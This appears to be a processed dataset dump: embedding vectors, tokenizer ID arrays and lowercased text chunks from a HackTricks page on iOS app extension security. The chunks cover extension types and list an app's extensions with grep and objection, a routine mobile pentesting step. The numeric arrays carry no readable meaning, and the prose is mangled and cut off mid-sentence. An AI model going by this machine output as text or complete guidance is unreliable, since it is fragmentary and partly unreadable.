0.11620135605335236, 0.5585254430770874, 0.09374910593032837, -0.5955610871315002, -0.567055344581604, -0.8441131711006165, 1.0704745054244995, 0.2481016218662262, 0.6302983164787292, -0.2604622542858124, -0.057726532220840454, 0.5989160537719727, -0.4067441523075104, -0.8971579074859619, -0.13138501346111298, -0.1835876703262329, -0.05148717761039734, -0.3061778247356415, -0.23545843362808228, 0.03220968693494797, 0.04986821487545967, 0.23376961052417755, -0.19466519355773926, 0.5058171153068542, 0.4691895842552185, -0.48713651299476624, 0.7672588229179382, 0.33057019114494324, 0.6401617527008057, -0.8102825880050659, -1.0049653053283691, 0.02842245250940323, 0.3638698160648346, -0.12108205258846283, -0.40083858370780945, -0.29442745447158813, 0.47292643785476685, 0.33204227685928345, 0.4875180125236511, 0.25116533041000366, -0.8602573871612549, 0.5319576859474182, -0.4170840382575989, 1.2008024454116821, -0.5910411477088928, -0.27157896757125854, 0.24635788798332214, -0.1726081818342209, -0.09145808964967728, -0.36473211646080017, 0.06217745319008827, 0.10885769873857498, -0.7607465982437134, 0.7569752931594849, 0.957792341709137, -0.7325760722160339, 0.4857423007488251, -0.0569094717502594, -0.3256656229496002, -0.4523061215877533, 0.7691937685012817, 1.2471603155136108, -1.0858572721481323, -0.30506572127342224, -0.04151105508208275, 0.40869617462158203, 0.11783873289823532, 0.7856095433235168, -1.132263422012329, -0.21930532157421112, 0.24865011870861053 ]
[ 1027, 2783, 4221, 5244, 1025, 4175, 1027, 2783, 3597, 16671, 1025, 10122, 1012, 8833, 1006, 1005, 1031, 1008, 19351, 6277, 2904, 1033, 4175, 1024, 1005, 1009, 4175, 1009, 1005, 2038, 3367, 4892, 2015, 1024, 1005, 1009, 19351, 6277, 1012, 2038, 3367, 4892, 2015, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1009, 1005, 2038, 3126, 4877, 1024, 1005, 1009, 19351, 6277, 1012, 2038, 3126, 4877, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1009, 1005, 2038, 9581, 8449, 1024, 1005, 1009, 19351, 6277, 1012, 2038, 9581, 8449, 1006, 1007, 1012, 2000, 3367, 4892, 1006, 1007, 1007, 1025, 10122, 1012, 8833, 1006, 5167, 1007, 1025, 1065, 1010, 6694, 1008, 1019, 1007, 1025, 102 ]
hack_tricks
433.txt
2
[CLS] ios app extensionscontent copied form url extensions let apps offer custom functionality and content to users while they ’ re interacting with other apps or the system. some notable ones are : custom keyboard : replaces the ios system keyboard with a custom keyboard for use in all apps. share : post to a sharing website or share content with others. today : also called widgets, they offer content or perform quick tasks in the today view of notification center. for example, the user selects text in the host app, clicks on the " share " button and selects one " app " or action from the list. this triggers the app extension of the containing app. the app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task ( post it on a social network, for example ). see this picture from the apple app extension programming guide which pretty good summarizes this : security considerationsfrom the security point of view it is important to note that : an app extension does never communicate directly with its containing app ( typically, it isn ’ t even running while the contained app extension is running ). an app extension and the host app communicate via inter - process communication. an app extension ’ s containing app and the host app don ’ t communicate at all. a today widget ( and no other app extension type ) can ask the system to open its containing app by calling the openurl : completionhandler : method of the nsextensioncontext class. any app extension and its containing app can access shared data in a privately defined shared container. app extensions cannot access some apis, for example, healthkit. they cannot receive data using airdrop but do can send data. no long - running background tasks are allowed but uploads or downloads can be initiated. app extensions cannot access the camera or microphone on an ios device ( except for imessage app extensions ). static analysisverifying if the app contains app extensionsif you have the original source code you can search for all occurrences of nsextensionpointidentifier with xcode ( cmd + shift + f ) or take a look into " build phases / embed app extensions " : there you can find the names of all embedded app extensions followed by. appex, now you can navigate to the individual app extensions in the project. if not having the original source code : grep for nsextensionpointidentifier among all files inside
[ 0.2700534462928772, -0.3216651380062103, -0.2768077850341797, 0.6223247051239014, -0.13218261301517487, -0.013798721134662628, 0.36940279603004456, 0.22478964924812317, 0.47296467423439026, 0.18520331382751465, -0.27447813749313354, 0.3964712917804718, 0.28620630502700806, -0.36843186616897583, -0.2789500951766968, -0.6285428404808044, -0.3895341753959656, 0.1450464129447937, -0.8429679870605469, 0.138248011469841, -0.014816121198236942, 0.16905029118061066, -1.140543818473816, -0.8352867960929871, -0.24673444032669067, 0.5882167816162109, 0.5497305393218994, 0.5159787535667419, 0.23811043798923492, 0.8348919749259949, -0.1466829627752304, 0.23334428668022156, 0.105887271463871, -0.6128336191177368, -0.17863991856575012, -0.18259842693805695, 0.9626468420028687, -0.584080159664154, 0.3018178343772888, -0.41880831122398376, 0.0011546097230166197, -0.4941730499267578, 0.4283585548400879, -0.44266167283058167, -0.14212378859519958, -0.7512526512145996, 0.33436405658721924, -0.27685919404029846, 0.692999541759491, -0.058836109936237335, 0.544567346572876, 0.1888408362865448, -0.08937317878007889, 0.14681336283683777, 0.16225115954875946, 0.0034274382051080465, 0.09064005315303802, 0.15265361964702606, -0.3709678053855896, 0.12895624339580536, -0.5143107771873474, 0.4823487102985382, 0.16507452726364136, -0.9693151712417603, -0.09101295471191406, 0.5480800867080688, -0.24803774058818817, -0.5274558663368225, -0.41989558935165405, -0.1309128701686859, -0.15315230190753937, 0.08959899097681046, -1.0212132930755615, -0.39875659346580505, -0.4247725009918213, -0.5628214478492737, -0.08290889114141464, -0.07096011936664581, 0.10437758266925812, 0.7107976078987122, -0.3023891746997833, 0.5311656594276428, 0.08989998698234558, -0.27648675441741943, -0.4280916154384613, -0.1531381905078888, 0.6367487907409668, 0.7299935817718506, -0.583487868309021, 0.1315150260925293, -0.19136326014995575, 0.1442645937204361, -0.4797156751155853, -0.6335163712501526, 0.3244553804397583, 1.2809582948684692, -0.08116700500249863, -0.22149932384490967, 0.0003435977268964052, -0.041120003908872604, 0.9275134801864624, -0.020619798451662064, 0.02342924103140831, 0.23848657310009003, -0.5062659978866577, 0.7727291584014893, 0.668383777141571, -0.23908023536205292, -0.28127744793891907, -0.6634781956672668, -0.06284569203853607, -0.08247087150812149, 0.1933564692735672, -0.7934296727180481, -0.4203755557537079, 0.26871490478515625, 0.08869464695453644, 0.2576190233230591, -0.5739139914512634, 1.0974273681640625, -0.543856680393219, -0.4597676694393158, 0.18938353657722473, 0.3040255010128021, 0.3843102753162384, 0.15089775621891022, 0.31022411584854126, 1.1990671157836914, -0.6690523624420166, -0.6334202289581299, 0.15948958694934845, 0.29480060935020447, 0.24169033765792847, 0.7659296989440918, -0.2554857134819031, 0.35757797956466675, 0.04324794188141823, 0.31847327947616577, 0.6425517797470093, -1.1611247062683105, -0.13591620326042175, 0.22870734333992004, 0.27557167410850525, 1.4497058391571045, 0.7605071067810059, -0.8019611835479736, -0.3800928592681885, -0.23417790234088898, -0.4791654348373413, -0.2976447343826294, -0.060066089034080505, 0.47202053666114807, 0.6824515461921692, -0.3477289080619812, -1.0805360078811646, 0.5088373422622681, -0.39885619282722473, 0.5487825870513916, -0.09164559841156006, -0.14738571643829346, -0.4744442403316498, 0.6180031299591064, 0.022592099383473396, 0.3356132209300995, -0.17344450950622559, 0.25099921226501465, -0.6609872579574585, -0.15504252910614014, -0.1940470039844513, 0.6381013989448547, 0.11972498893737793, 0.5773934125900269, -0.12412796914577484, -0.20512723922729492, 0.8897567391395569, 1.177144169807434, 0.11581002175807953, 0.15838965773582458, 0.03259185701608658, 0.27691850066185, -0.6440908908843994, 0.2956291437149048, 0.11412813514471054, 0.5640127062797546, -0.3810153305530548, 0.19721569120883942, -0.22585709393024445, -0.72190260887146, -0.07972162961959839, -0.7019150853157043, -0.2473154366016388, 0.14512647688388824, -0.6031872034072876, 0.6629615426063538, 0.4649749994277954, 0.10282094031572342, -1.0742074251174927, 0.09363515675067902, 0.03803358972072601, -0.8480829000473022, -0.34960031509399414, 0.2048550397157669, 0.27243608236312866, 0.5171331167221069, -0.32653993368148804, -0.32517701387405396, 0.48851478099823, 0.8296633362770081, -0.0703359842300415, 0.6313266754150391, 0.7900745272636414, -0.06371811032295227, -0.6567999124526978, -0.20196036994457245, 0.19520097970962524, -0.9009395241737366, -0.46077409386634827, 0.5186651945114136, -0.2681973874568939, 0.014021823182702065, -0.12257091701030731, 0.43544384837150574, 0.7242737412452698, 0.0353894978761673, 0.1387854963541031, -0.1876305639743805, 0.16494666039943695, -0.1835273653268814, -0.7648210525512695, 0.020786680281162262, -0.4048393666744232, 0.39897575974464417, 0.47665417194366455, 1.376894474029541, 0.059840478003025055, -0.4215260446071625, -0.0875590592622757, -0.06316564977169037, 0.7874032258987427, -0.1646040678024292, -0.15469501912593842, 0.6846331357955933, 0.2573249042034149, 0.8482510447502136, 0.3430582284927368, 0.44542592763900757, 0.36284273862838745, -0.3500014543533325, 0.2906692326068878, 0.4159623086452484, -0.4241335988044739, 1.022692322731018, 0.40043529868125916, 0.000989704392850399, -0.6269579529762268, -0.6823648810386658, 0.5629739165306091, 0.38481131196022034, -0.4751847982406616, -1.1473424434661865, 0.3225443959236145, -0.5344577431678772, -0.6024261713027954, 0.031360819935798645, 0.4174332320690155, 0.48785874247550964, -0.034251078963279724, 0.03435136377811432, -0.9315168857574463, -1.1172446012496948, -0.6397746205329895, -0.3574658930301666, -0.5537108778953552, -0.4951350688934326, -1.1663117408752441, -0.22372649610042572, 0.4990308880805969, -0.27495065331459045, 1.0519338846206665, -0.3388265371322632, -0.2875537872314453, -0.00427163764834404, -0.0036760589573532343, 0.4513365924358368, -0.7120952606201172, 0.356118381023407, -0.5468701124191284, 0.11574627459049225, -0.03646978363394737, 0.9507817625999451, -0.15948645770549774, 0.012624594382941723, -0.2144949585199356, 0.0048888628371059895, 0.3774658441543579, -0.5983168482780457, 0.33747074007987976, 0.26722750067710876, -0.32705795764923096, -0.2775202989578247, 0.24868540465831757, -0.17070849239826202, 0.2592522203922272, 0.014308186247944832, -0.04634186998009682, 0.8347273468971252, 0.3546891212463379, -0.20701493322849274, 0.8767101764678955, 0.31419456005096436, -0.3689157962799072, 0.24324874579906464, -0.3317554295063019, 0.35720476508140564, -0.4673355221748352, -0.19417838752269745, 0.06425216048955917, 0.06679356843233109, -0.1618162989616394, -0.2532138228416443, 0.1244170069694519, -0.41771364212036133, -0.9389482140541077, -0.03894020617008209, 0.07073676586151123, 0.0506010428071022, -0.4433770179748535, -1.067321538925171, 0.5312385559082031, -0.38978859782218933, 0.028676791116595268, -0.5711655616760254, -0.135092094540596, 1.047145962715149, 0.07671763747930527, 0.23565444350242615, 0.18898549675941467, -0.4518943130970001, -0.07208699733018875, -0.0546855702996254, 0.5092137455940247, -0.3115502595901489, -0.06375515460968018, -0.15036724507808685, 0.0925496518611908, 0.7036573886871338, 0.12810397148132324, -0.07340467721223831, -0.17310063540935516, -0.32513925433158875, -0.10822828114032745, -0.07870561629533768, -0.10461229085922241, 0.18988202512264252, 0.1645096242427826, 0.3883431553840637, -0.3898056447505951, 0.041312530636787415, -0.3430783450603485, 0.2699165344238281, 0.46477657556533813, 0.11931242048740387, -0.12119393050670624, -0.07737670838832855, -0.3346988260746002, -0.317962110042572, 0.5423829555511475, 0.3507753014564514, 0.022221699357032776, 0.07997200638055801, 0.4956662654876709, -0.12028180062770844, 0.5107003450393677, 0.5951446294784546, -0.4244305491447449, -0.7301751971244812, 0.8901945352554321, -0.33229944109916687, 0.39593344926834106, 0.07144585996866226, 0.274507611989975, 0.0673651322722435, 0.19233180582523346, 0.5672728419303894, 0.14621201157569885, -0.22521467506885529, -0.5631337761878967, -0.15717799961566925, 0.599061906337738, -0.08783559501171112, -0.28900718688964844, 0.2066495567560196, 0.5219547748565674, 0.2039410024881363, -0.7947929501533508, -0.6784828305244446, 0.7309101819992065, 0.6602903008460999, 0.9881638884544373, 0.4841286838054657, 0.7413259744644165, 0.1354084461927414, -0.10646701604127884, 0.4312334954738617, -0.6804566979408264, -0.06531602889299393, -0.4849810004234314, 0.34102845191955566, -0.5051663517951965, 0.005821737460792065, -0.7455372214317322, -0.18150191009044647, 0.0013336940901353955, -0.06667069345712662, 0.5880910158157349, 0.2577763497829437, -0.3678339719772339, -0.4508213698863983, 0.3470281958580017, 0.3140840530395508, -0.636580228805542, -0.04423243924975395, -0.030991172417998314, -0.013605941087007523, 0.5210257768630981, -0.8018882274627686, 0.0027161166071891785, -0.6013954877853394, 0.2294645458459854, 0.25510695576667786, 0.13202467560768127, -0.43336740136146545, -0.8071578741073608, -0.284932404756546, -0.6975098252296448, 0.5252519845962524, 0.2594550549983978, 0.2409539371728897, 0.13063928484916687, -0.6008988618850708, -0.06478540599346161, 0.9371132254600525, 0.02011372148990631, -0.8462177515029907, 0.039421197026968, 0.2158830165863037, 0.7608340978622437, 0.6637222766876221, -0.5328943133354187, -0.1674058735370636, 0.3900575637817383, -0.512532651424408, 1.2236777544021606, -0.49350428581237793, 0.21408414840698242, -0.2935798466205597, 0.26239439845085144, -0.36685678362846375, 0.1535508781671524, -0.5781043171882629, 0.30526500940322876, 0.04437067359685898, 0.5314284563064575, 0.41273966431617737, -0.2799476385116577, 1.1705021858215332, -0.16046947240829468, -0.1703292429447174, 0.3502185344696045, 0.64482182264328, -0.09616854041814804, 0.28912287950515747, -0.7026719450950623, -0.0038521296810358763, 0.8782840371131897, -0.9706051349639893, 0.33141353726387024, 0.1990838348865509, -0.05130980163812637, 0.21527118980884552, -0.4069485366344452, 0.2832687497138977, 0.04750509187579155, 0.24106177687644958, -1.0696693658828735, 0.061876580119132996, -0.058723580092191696, 0.033122919499874115, 0.10541980713605881, 0.6738960146903992, 0.3617587089538574, -0.18170155584812164, 0.10293231904506683, -0.5091880559921265, -0.5583864450454712, -0.6045473217964172, 0.035068295896053314, 0.21227553486824036, -0.2788861095905304, -0.10182083398103714, 0.6277713179588318, -0.21997308731079102, -0.14605776965618134, 0.2207222282886505, 0.68125981092453, -0.39474502205848694, -1.0775721073150635, -0.3664570450782776, -0.19891884922981262, -0.06490155309438705, -0.29026082158088684, 0.383816659450531, 0.08360718190670013, 0.011235374957323074, -0.09260380268096924, 0.5686569213867188, 0.5206214785575867, -0.5446725487709045, -0.04157678037881851, 0.5944521427154541, -0.2809545397758484, 0.0772218331694603, -0.6096352338790894, 0.7137324810028076, -0.32113024592399597, -0.23176167905330658, -0.11572965979576111, -0.1471531093120575, -0.4666455090045929, -0.8132469058036804, -0.2560945451259613, -0.5106310844421387, 0.4552428126335144, -0.7566985487937927, -0.08566391468048096, -0.23795829713344574, 0.15734566748142242, 0.1857316792011261, -0.7122620344161987, -0.06053701415657997, -0.12330851703882217, 0.08684927970170975, 0.3938615024089813, 0.1193620041012764, -0.3727884292602539, -0.035710155963897705, 0.23512105643749237, 0.9527705907821655, -0.14733202755451202, -0.049126677215099335, -0.41475242376327515, -0.07556063681840897, 0.20684370398521423, 0.2623167932033539, -0.8137155771255493, 0.08009428530931473, -0.4202257990837097, -0.21274344623088837, 0.08862845599651337, 0.8728941082954407, -0.25042685866355896, 0.5794318914413452, -0.10183943808078766, -0.9667059183120728, 0.35953590273857117, -0.020379403606057167, -0.22921983897686005, 0.15992726385593414, 0.4872649610042572, -0.40361398458480835, -0.0631350502371788, -0.19360528886318207, 0.8284105062484741, -0.0893343910574913, -0.2351413071155548, -1.07278311252594, 0.004608187358826399, -0.7403627038002014, -1.064599633216858, 0.8373937010765076, -0.032359033823013306, 0.04205900430679321, -0.0032071713358163834, -0.1528458297252655, 0.18284547328948975, -0.28474098443984985, 0.06930416822433472, 1.0411278009414673, 0.35412898659706116, -0.12849357724189758, -0.340054988861084, 0.6738395690917969, 0.4081490635871887, -0.4379340708255768, 0.15214797854423523, -0.26909610629081726, -0.0599202886223793, -0.2066592276096344, -0.3204687833786011, -0.25747039914131165, -0.9026968479156494, -0.07624045014381409, 0.20768797397613525, -0.17607425153255463, 0.3062375485897064, 0.04139135032892227, -1.0808451175689697, 0.16776856780052185, 0.10483591258525848, -0.4361357092857361, -0.19661635160446167, 0.9430119395256042, 0.4976191520690918, 0.22680258750915527, -0.3204295039176941, 0.3045087158679962, -0.030837582424283028, 0.017418039962649345, 0.7620819211006165, -0.49003058671951294, -0.40779030323028564, 1.011296033859253, 0.6269683837890625, -0.45207276940345764, -0.16128478944301605, 0.21679101884365082, -0.1330520659685135, -0.054217297583818436, -0.5095612406730652, -0.19922935962677002, -0.23641549050807953, 0.11877352744340897, -0.0964619442820549, 0.1260494440793991, 0.16322720050811768, -0.19047851860523224, -0.8025569319725037, 0.2732867896556854, 0.01380554772913456, 0.15062016248703003, 0.2985265254974365, -0.7676414847373962, -0.16924117505550385, -0.591650128364563, 0.015828300267457962, -0.16683247685432434, 0.38743436336517334, 0.7537752985954285, -0.36198899149894714, 0.29858824610710144, -0.08026301860809326, 0.07116693258285522, 0.35879048705101013, -0.18754412233829498, 0.07212980091571808, 0.6961433291435242, 0.012278417125344276, -0.4311538338661194, -0.5199142098426819, 0.19655543565750122, -0.15808908641338348, 0.3713380992412567, -0.7452351450920105, -0.38632333278656006, 0.11723595857620239, 0.2031809687614441, 0.2329314798116684, -0.5567162036895752, -1.0727794170379639, -0.9676081538200378, 0.14298665523529053, 0.13491301238536835, -0.5051736831665039, 0.1934729963541031, 0.3884558379650116, 0.2627159357070923, -0.45962288975715637, -0.5479743480682373, 0.7047263383865356, -0.2102331966161728, 0.14156439900398254, -0.2109222114086151, 0.7652361989021301, -0.26151272654533386, -0.026690423488616943, -0.5443606972694397, -0.09841109067201614, -0.8592886924743652, -0.6153819561004639, -0.5200251340866089, -0.15306687355041504, -0.5671280026435852, 0.5702257752418518, -0.5486189723014832, -0.28619667887687683, -0.012982611544430256, -0.6971315741539001, 0.16744846105575562, 0.855931282043457, -0.5825644135475159, -0.6679917573928833, 0.7192323803901672, -0.3441759943962097, 0.2987750768661499, -0.7927695512771606, -0.1515849083662033, -0.15142205357551575, -0.5855697989463806, 0.043694399297237396, -0.13862264156341553, -0.5437777638435364, -0.25880327820777893, 0.24935884773731232, -0.3061206340789795, -0.05634842440485954, -0.7383801937103271, 0.00045717123430222273, 0.2717873454093933, -0.47993555665016174, 0.2532670199871063, 0.7463549375534058, 0.029383838176727295, 0.24769942462444305, -0.9175531268119812, 0.5168504118919373, 0.3095966875553131, -0.3587228059768677, -0.30535393953323364, 0.2161165028810501, 0.2887914478778839, -0.6142559051513672, -0.6059306263923645, 0.04899130016565323, -0.41033440828323364, 0.1940843164920807, -0.0647340938448906, 0.2963789403438568, -0.5989110469818115, 0.12385745346546173, 0.396485835313797, 0.45245611667633057, 0.5016117095947266, -0.058626048266887665, 0.6532726883888245, -0.25226932764053345, -0.5724304914474487, 0.3587826192378998, -0.5197983384132385, -0.09552034735679626, 0.1792648583650589, 0.08168352395296097, 0.09676529467105865, -0.5578023195266724, -0.3251391053199768, -0.051361583173274994, 0.2942195236682892, -0.26152271032333374, 0.7205034494400024, 0.33459219336509705, 0.08411528915166855, 0.7256120443344116, -0.16095766425132751, -0.31447216868400574, -0.06596512347459793, 0.44648170471191406, -0.9191282987594604, -0.8261212110519409, 0.36989352107048035, 0.6908926963806152, -0.09039875119924545, -0.14122426509857178, -0.22077347338199615, 0.38434913754463196, 0.4343050420284271, 0.16565507650375366, 0.076567143201828, -0.11553918570280075, -0.6119771003723145, 0.5803799033164978, -0.5934684872627258, 0.3472808301448822, -0.04887690767645836, -0.022279519587755203, 0.515451967716217, -0.3829444646835327, -0.3105042576789856, 0.606195330619812, 0.7514636516571045, -0.0028158514760434628, 0.6436286568641663, 0.24031870067119598, -0.07691183686256409, -0.32496944069862366, -0.2866959273815155, -0.6079983115196228, -0.1484704464673996, 0.03876158222556114, -0.1856907457113266, 0.1038467288017273, 0.006332123186439276, 0.7192782163619995, -0.5846002697944641, -0.029593950137495995, 0.3794323801994324, 0.04542852193117142, -0.5287202596664429, 0.327826589345932, -0.5046916604042053, -0.3810306787490845, -0.06791902333498001, -0.6755982041358948, 0.001151462085545063, 0.04412437602877617, 0.240127831697464, 0.3537653982639313, -0.4258362650871277, 0.6078571677207947, -0.3514253795146942, 0.1412999927997589, -0.020512808114290237, 0.6172105073928833, 0.06917789578437805, -0.3027869164943695, -0.3003813326358795, 0.7118018269538879, 0.7691518068313599, 0.6441188454627991, 0.7321996092796326, 1.0509374141693115, -0.3612140119075775, -0.13131654262542725, 0.4106747806072235, -0.43999508023262024, -0.5014301538467407, -0.05952169746160507, 0.2107534259557724, -0.3661322593688965, -0.3725387454032898, 0.24941541254520416, 0.4581168293952942, -0.18554933369159698, 0.34277182817459106, -0.18318398296833038, -0.13344919681549072, -0.6121333241462708, 0.31387779116630554, -0.21336659789085388, 0.223380446434021, 0.5646882057189941, -0.3511999547481537, -0.6228735446929932, 0.43197935819625854, 0.19173897802829742, 0.4723712205886841, -0.1621444821357727, 0.13015121221542358, -0.07680739462375641, 0.2794747054576874, 0.5930952429771423, -0.1820211261510849, -1.1151460409164429, -0.29446324706077576, 0.03075879067182541, -0.8717866539955139, 0.0193276796489954, -0.13908027112483978, 0.7116372585296631, -0.18064932525157928, -0.20822209119796753, -0.21286644041538239, 0.149727463722229, -0.5648250579833984, -0.21383072435855865, 0.47165802121162415, 0.17006409168243408, -0.2884756028652191, 0.11564420163631439, 0.0870286300778389, -0.11669668555259705, 0.4362408220767975, -0.21733547747135162, -0.6682823896408081, -0.1536664217710495, -0.12632007896900177, 0.005567310843616724, 1.033290147781372, -0.8335722088813782, -0.5029453039169312, 0.07513260841369629, -0.6114310026168823, -0.7331794500350952, 0.02182176150381565, -0.27011269330978394, -0.673822283744812, 0.5490180850028992, 0.1959725022315979, -0.01707286387681961, 0.1525922417640686, -0.4893389046192169, -0.3174804747104645, 0.14079569280147552, 0.815885603427887, -0.3635260760784149, 0.6772587895393372, 0.4907033443450928, -0.020439513027668, 0.2581029534339905, -0.40461787581443787, 0.8034932613372803, -0.43472132086753845, -0.2993864119052887, -0.0955081582069397, -0.04067768529057503, -0.2388249635696411, -0.21463963389396667, 0.1201602891087532, -0.03272019326686859, 0.6016247272491455, -0.03836796060204506, -1.2546765804290771, -0.5809534788131714, -0.5132713317871094, 0.6918481588363647, 0.02755398117005825, 0.2917121350765228, 0.44545939564704895, 0.027971621602773666, 0.9391573667526245, -1.686397910118103, 4.555348873138428, 0.6365190148353577, -0.31679767370224, 0.21973183751106262, 0.14799794554710388, 0.6862598061561584, 1.1068503856658936, -0.8795442581176758, 0.22805702686309814, -0.3786149024963379, 0.07327336072921753, 0.008341122418642044, 0.5421097874641418, 0.5263890624046326, 0.2035793513059616, 0.5583197474479675, -0.4823746085166931, 0.26967522501945496, 0.20149192214012146, -0.8859771490097046, -0.8119488954544067, 0.16882304847240448, 0.3677358329296112, 0.7982751131057739, 0.31589508056640625, 0.5582257509231567, 0.2664848268032074, -0.12537357211112976, 0.008831274695694447, -0.5404574275016785, 0.39023536443710327, -0.4884817600250244, 0.13010230660438538, -0.41172337532043457, -0.5691947937011719, 0.4514698386192322, -0.013032341375946999, -0.9530581831932068, -0.03815186768770218, -0.14207352697849274, -0.05689351260662079, -0.10379838198423386, 0.019071118906140327, -0.11721600592136383, 0.506066620349884, 0.38737496733665466, -0.2619421184062958, 0.07528609782457352, 0.932867169380188, -0.8636771440505981, 0.6730661392211914, 0.00652711559087038, 0.5690932869911194, 0.14227038621902466, -0.29034075140953064, -0.29574137926101685, 0.30965864658355713, -0.26368123292922974, -0.16388913989067078, -0.16288164258003235, 0.839447557926178, -0.6971793174743652, 0.10644779354333878, 0.19117343425750732, -0.41684573888778687, 0.6691969037055969, 0.3472226560115814, 0.5220260620117188, -0.0886356458067894, -0.2843348979949951, -0.45819413661956787, 0.12055095285177231, -0.9486271739006042, -0.39192572236061096, 0.8721535801887512, -0.3930191397666931, 0.18189604580402374, 0.14634285867214203, 0.6170852184295654, -0.5623405575752258, 0.38731104135513306, -0.4971849024295807, -1.0061519145965576, 0.7179944515228271, 0.284759521484375, 0.7600415945053101, -0.2554916441440582, -0.9398959875106812, -0.17930856347084045, -0.02234315685927868, 0.45116907358169556, -0.29872313141822815, -0.020428743213415146, 0.13369953632354736, 0.10604073852300644 ]
[ 101, 16380, 10439, 14305, 8663, 6528, 2102, 15826, 2433, 24471, 2140, 14305, 2292, 18726, 3749, 7661, 15380, 1998, 4180, 2000, 5198, 2096, 2027, 1521, 2128, 21935, 2007, 2060, 18726, 2030, 1996, 2291, 1012, 2070, 3862, 3924, 2024, 1024, 7661, 9019, 1024, 20736, 1996, 16380, 2291, 9019, 2007, 1037, 7661, 9019, 2005, 2224, 1999, 2035, 18726, 1012, 3745, 1024, 2695, 2000, 1037, 6631, 4037, 2030, 3745, 4180, 2007, 2500, 1012, 2651, 1024, 2036, 2170, 15536, 28682, 1010, 2027, 3749, 4180, 2030, 4685, 4248, 8518, 1999, 1996, 2651, 3193, 1997, 26828, 2415, 1012, 2005, 2742, 1010, 1996, 5310, 27034, 3793, 1999, 1996, 3677, 10439, 1010, 29225, 2006, 1996, 1000, 3745, 1000, 6462, 1998, 27034, 2028, 1000, 10439, 1000, 2030, 2895, 2013, 1996, 2862, 1012, 2023, 27099, 1996, 10439, 5331, 1997, 1996, 4820, 10439, 1012, 1996, 10439, 5331, 8834, 2049, 3193, 2306, 1996, 6123, 1997, 1996, 3677, 10439, 1998, 3594, 1996, 5167, 3024, 2011, 1996, 3677, 10439, 1010, 1996, 3479, 3793, 1999, 2023, 2553, 1010, 2000, 4685, 1037, 3563, 4708, 1006, 2695, 2009, 2006, 1037, 2591, 2897, 1010, 2005, 2742, 1007, 1012, 2156, 2023, 3861, 2013, 1996, 6207, 10439, 5331, 4730, 5009, 2029, 3492, 2204, 7680, 7849, 10057, 2023, 1024, 3036, 16852, 19699, 5358, 1996, 3036, 2391, 1997, 3193, 2009, 2003, 2590, 2000, 3602, 2008, 1024, 2019, 10439, 5331, 2515, 2196, 10639, 3495, 2007, 2049, 4820, 10439, 1006, 4050, 1010, 2009, 3475, 1521, 1056, 2130, 2770, 2096, 1996, 4838, 10439, 5331, 2003, 2770, 1007, 1012, 2019, 10439, 5331, 1998, 1996, 3677, 10439, 10639, 3081, 6970, 1011, 2832, 4807, 1012, 2019, 10439, 5331, 1521, 1055, 4820, 10439, 1998, 1996, 3677, 10439, 2123, 1521, 1056, 10639, 2012, 2035, 1012, 1037, 2651, 15536, 24291, 1006, 1998, 2053, 2060, 10439, 5331, 2828, 1007, 2064, 3198, 1996, 2291, 2000, 2330, 2049, 4820, 10439, 2011, 4214, 1996, 2330, 3126, 2140, 1024, 6503, 11774, 3917, 1024, 4118, 1997, 1996, 24978, 10288, 29048, 8663, 18209, 2465, 1012, 2151, 10439, 5331, 1998, 2049, 4820, 10439, 2064, 3229, 4207, 2951, 1999, 1037, 9139, 4225, 4207, 11661, 1012, 10439, 14305, 3685, 3229, 2070, 17928, 2015, 1010, 2005, 2742, 1010, 2740, 23615, 1012, 2027, 3685, 4374, 2951, 2478, 2250, 25711, 2021, 2079, 2064, 4604, 2951, 1012, 2053, 2146, 1011, 2770, 4281, 8518, 2024, 3039, 2021, 2039, 11066, 2015, 2030, 22956, 2064, 2022, 7531, 1012, 10439, 14305, 3685, 3229, 1996, 4950, 2030, 15545, 2006, 2019, 16380, 5080, 1006, 3272, 2005, 10047, 7971, 4270, 10439, 14305, 1007, 1012, 10763, 4106, 6299, 11787, 2065, 1996, 10439, 3397, 10439, 14305, 10128, 2017, 2031, 1996, 2434, 3120, 3642, 2017, 2064, 3945, 2005, 2035, 27247, 1997, 24978, 10288, 29048, 8400, 5178, 16778, 8873, 2121, 2007, 1060, 16044, 1006, 4642, 2094, 1009, 5670, 1009, 1042, 1007, 2030, 2202, 1037, 2298, 2046, 1000, 3857, 12335, 1013, 7861, 8270, 10439, 14305, 1000, 1024, 2045, 2017, 2064, 2424, 1996, 3415, 1997, 2035, 11157, 10439, 14305, 2628, 2011, 1012, 10439, 10288, 1010, 2085, 2017, 2064, 22149, 2000, 1996, 3265, 10439, 14305, 1999, 1996, 2622, 1012, 2065, 2025, 2383, 1996, 2434, 3120, 3642, 1024, 24665, 13699, 2005, 24978, 10288, 29048, 8400, 5178, 16778, 8873, 2121, 2426, 2035, 6764, 2503 ]
hack_tricks
434.txt
0
the app bundle ( ipa or installed app ) : $ grep - nr nsextensionpointidentifier payload / telegram \ x. app / binary file payload / telegram x. app / / plugins / siriintents. appex / info. plist matchesbinary file payload / telegram x. app / / plugins / share. appex / info. plist matchesbinary file payload / telegram x. app / / plugins / notificationcontent. appex / info. plist matchesbinary file payload / telegram x. app / / plugins / widget. appex / info. plist matchesbinary file payload / telegram x. app / / watch / watch. app / plugins / watch extension. appex / info. plist matchesyou can also access per ssh, find the app bundle and list all inside plugins ( they are placed there by default ) or do it with objection : ph. telegra. telegraph on ( iphone : 11. 1. 2 ) [ usb ] # cd plugins / var / containers / bundle / application / 15e6a58f - 1ca7 - 44a4 - a9e0 - 6ca85b65fa35 / telegram x. app / pluginsph. telegra. telegraph on ( iphone : 11. 1. 2 ) [ usb ] # lsnsfiletype perms nsfileprotection read write name - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - directory 493 none true false notificationcontent. appexdirectory 493 none true false widget. appexdirectory 493 none true false share. appexdirectory 493 none true false siriintents. appexwe can see now the same four app extensions that we saw in xcode before. determining the supported data typesthis is important for data being shared with host apps ( e. g. via share or action extensions ). when the user selects some data type in a host app and it matches the data types define here, the host app will offer the extension. it is worth noticing the difference
